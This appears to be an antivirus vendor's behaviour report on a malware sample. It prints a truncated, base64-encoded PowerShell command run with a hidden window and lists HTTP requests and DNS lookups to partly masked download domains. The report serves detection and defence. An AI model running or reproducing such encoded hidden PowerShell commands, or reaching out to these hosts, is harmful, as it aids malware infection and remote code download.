Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABTAGQATwBNAHYAbgBoAD0AJwBGAFQAawBGADAAegBmAE4AJwA7ACQARwBDAFUAVgBtAGQAMwAgAD0AIAAnADgANgA0ACcAOwAkAGsAdgBqAGoASQBjAFIAPQAnAEgANgBZAGkAVwBjACcAOwAkAGgAUgBjAGgAbABkAD0AJABlAG4AdgA6AHUAc...
Network activity
TCP
HTTP GET requests
- http://www.pn###sarim.com/cgi-bin/somv25921/
- http://www.ri###gazine.com/ri/l798/
- http://www.gr###dreyer.com/o3ao/7m0bj64/
UDP
- DNS ASK pn###sarim.com
- DNS ASK ri###gazine.com
- DNS ASK gr###dreyer.com
- DNS ASK ad##an.net
- DNS ASK ve#####community.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABTAGQATwBNAHYAbgBoAD0AJwBGAFQAawBGADAAegBmAE4AJwA7ACQARwBDAFUAVgBtAGQAMwAgAD0AIAAnADgANgA0ACcAOwAkAGsAdgBqAGoASQBjAFIAPQAnAEgANgBZAGkAVwBjACcAOwAkAGgAUgBjAGgAbABkAD0AJABlAG4AdgA6AHUAc...' (with hidden window)
